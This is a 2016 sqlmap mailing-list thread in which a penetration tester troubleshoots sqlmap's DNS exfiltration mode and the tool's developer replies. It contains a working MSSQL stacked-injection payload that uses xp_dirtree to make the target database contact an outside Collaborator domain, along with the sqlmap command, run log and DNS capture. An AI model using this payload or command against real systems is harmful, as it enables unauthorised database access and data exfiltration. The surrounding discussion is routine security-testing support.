Re: [sqlmap-users] Sqlmap/DNS exfil
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Sqlmap/DNS exfil
|
From: Miroslav S. <mir...@gm...> - 2016-12-19 23:04:42
|
As said, there should be at least one other SQLi technique available. In your case there is NONE. sqlmap will not blindly use dns-exfil if at least one other technique worked. Bye On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote: > Thanks, that's good advice. And I probably should post a little more > detail on what I'm running here so others can see it as well. > > > Here's the command executing: > > > root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p > ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain= > dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os > "Windows" --threads 1 > ___ > __H__ > ___ ___[.]_____ ___ ___ {1.0.12#stable} > |_ -| . [)] | .'| . | > |___|_ [']_|_|_|__,| _| > |_|V |_| http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 16:56:14 > > [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt' > [16:56:14] [INFO] setting up DNS server instance > custom injection marking character ('*') found in option > '--headers/--user-agent/--referer/--cookie'. Do you want to process it? > [Y/n/q] n > [16:56:16] [INFO] testing connection to the target URL > [16:56:18] [INFO] testing if the target URL is stable > [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page > comparison on a sequence matcher. If no dynamic nor injectable parameters > are detected, or in case of junk results, refer to user's manual paragraph > 'Page comparison' and provide a string or regular expression to match on > how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C > [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter > 'ProductCategory' might not be injectable > [16:56:23] [INFO] testing for SQL injection on GET parameter > 'ProductCategory' > [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - > WHERE or HAVING clause (IN)' > [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' > [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries > (comment)' > [16:56:39] [WARNING] time-based comparison requires larger statistical > model, please wait......... (done) > [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind > (IF)' > [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be > injectable > [16:58:03] [CRITICAL] all tested parameters appear to be not injectable. > Try to increase '--level'/'--risk' values to perform more tests. Also, you > can try to rerun by providing either a valid value for option '--string' > (or '--regexp'). If you suspect that there is some kind of protection > mechanism involved (e.g. WAF) maybe you could retry with an option > '--tamper' (e.g. '--tamper=space2comment') > [16:58:03] [WARNING] HTTP error codes detected during run: > 500 (Internal Server Error) - 98 times > > [*] shutting down at 16:58:03 > > > > And then, my capture results for DNS traffic: > > > root@bass:~# tcpdump -n -i eth0 udp port 53 > tcpdump: verbose output suppressed, use -v or -vv for full protocol decode > listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes > 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? > www.testsite.org. (30) > 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? > www.testsite.org. (30) > 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A > 173.213.231.200 (46) > 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117) > 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? > www.testsite.org. (30) > 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? > www.testsite.org. (30) > 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A > 173.213.231.200 (46) > 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117) > 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? > www.testsite.org. (30) > 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? > www.testsite.org. (30) > 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A > 173.213.231.200 (46) > 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117) > 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? > www.testsite.org. (30) > 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? > www.testsite.org. (30) > 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A > 173.213.231.200 (46) > 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117) > 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? > www.testsite.org. (30) > 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? > www.testsite.org. (30) > 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A > 173.213.231.200 (46) > 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117) > > > It doesn't seem like an injection pattern is being tried that is getting > the DNS exfiltration to occur... or else I'm doing something else wrong. > > > Thanks, > > V > > ------------------------------ > *From:* Miroslav Stampar <mir...@gm...> > *Sent:* Monday, December 19, 2016 4:10 PM > *To:* Mark M. > *Cc:* sql...@li... > *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil > > I would suggest you to run the wireshark or similar when running the > --dns-domain to properly debug what is going on. There could be really lots > of problems before you fine tune it (e.g. other service running on :53). > > About the "forcing" sqlmap for using dns-exfil. It will always at least > try to test it at the start of a run (if other injection technique > available). Also, it will prefer other "faster" techniques (ERROR and > UNION) over dns-exfil. However, there is a hidden switch "--force-dns" > which will force the usage of dns-exfil even if ERROR/UNION are available. > > As said, the best advice I can give to you is to run the wireshark during > the run and really see what is going on. > > Bye > > On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote: > >> I have a situation where Burp has detected the following DNS exfiltration >> injection for a query parameter in a web app: >> >> >> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q% >> 20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux >> lo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.d >> bo.xp_dirtree%20@q%3b--%20 HTTP/1.1 >> >> >> To make that a little easier to read, the injected value is: >> >> >> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvp >> ngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree >> @q;-- >> >> >> I've modified the domain and verified that I receive the DNS requests on >> my local DNS server (the domain which I provide to sqlmap using the >> --dns-domain=xxx option) when the injection is manually sent to the page. >> The problem is, when I pass the request to sqlmap it's not detecting that >> there's an injection at all. I've provided the OS/DBMS and --level 5, but >> still no dice. I'm using sqlmap v1.0.12#stable. >> >> >> Since I've gotten many other injections to work in the past, I believe >> that I'm using sqlmap properly (formatting my request in a file >> appropriately, specifying the correct parameter to test, etc.) However, it >> surprised me that what appeared to be a fairly straight-forward stacked SQL >> injection would slip by all of sqlmap's tests. Is there a way to force >> sqlmap to try DNS exfiltration injections despite no other injection >> technique succeeding? >> >> >> Thanks >> >> V >> >> >> >> >> ------------------------------------------------------------ >> ------------------ >> Developer Access Program for Intel Xeon Phi Processors >> Access to Intel Xeon Phi processor-based developer platforms. >> With one year of Intel Parallel Studio XE. >> Training and support from Colfax. >> Order your platform today.http://sdm.link/intel >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
